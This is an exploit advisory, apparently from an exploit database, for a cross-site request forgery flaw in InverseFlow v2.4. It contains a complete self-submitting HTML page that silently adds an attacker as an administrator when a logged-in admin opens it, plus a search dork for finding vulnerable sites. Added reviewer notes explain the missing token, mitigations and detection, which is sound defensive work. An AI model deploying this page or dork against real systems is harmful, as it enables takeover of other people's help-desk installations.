#(+) Exploit Title: InverseFlow v2.4 CSRF Vulnerabilities (Add Admin User)
#(+) Version : 2.4
#(+) Author: EjRaM HaCkEr
#(+) Contact : m2z()9.cn
#(+) Dork: inurl:"ticket.php?cmd=lost"
#(+) Software Link : http://asria.info/download/script/inverseflow.zip
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# All you have to do is save the below code as exploit.html
# will automatically add the attacker as Admin without warning ;)
# The password will be sent automatically to email ;)
#
# Reviewer note (root cause): the form below sends only cmd, name and email to
# user.php. It carries no per-session secret, so according to this advisory the
# "add" action is authorised by the administrator's session cookie alone.
# Reviewer note (mitigation): the page shows no vendor fix. The usual controls
# are a server-validated anti-CSRF token on every state-changing user.php
# command, a SameSite restriction on the session cookie, an Origin/Referer check
# on POSTs, and re-authentication before an account is created.
# Reviewer note (detection): look for POSTs to user.php with cmd=add whose
# Origin/Referer is not the application's own host, and for accounts created
# outside a normal admin workflow.
Code:
<html>
<head>
</head>
<!-- The onload handler starts the submission as soon as the page has loaded;
     the page contains no button or prompt. -->
<body onload="javascript:fireForms()">
<script language="JavaScript">
// Delay values, one per form; indexed by form position in fireForms().
// The entry is a string and is coerced to a number by the "<" comparison
// in pausecomp().
var pauses = new Array( "2360" );

// Busy-wait: loops until roughly `millis` milliseconds have elapsed since the
// call. Script on this page is blocked for that time.
function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while(curDate-date < millis);
}

// Submits the first `count` forms in the document (count is 1 here, so only
// form0), pausing after each submit.
function fireForms()
{
    var count = 1;
    var i=0;
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        pausecomp(pauses[i]);
    }
}
</script>
<!-- Cross-site POST to the application's user.php. The action points at
     localhost, i.e. the author's own test install. Every field is a fixed,
     guessable value and none of them is a token bound to the session, which
     is what makes the request forgeable. -->
<form method="POST" name="form0" action="http://localhost/support/user.php">
<input type="hidden" name="cmd" value="add"/>
<input type="hidden" name="name" value="ejram hacker"/>
<input type="hidden" name="email" value="ejram@gmail.com"/>
</form>
</body>
</html>
########################################################################
(+)Exploit Coded by: EjRaM HaCkEr
(+)Gr33ts to : tryag.cc + r00t-s3c.com + v99x.com :)
######################################################################## |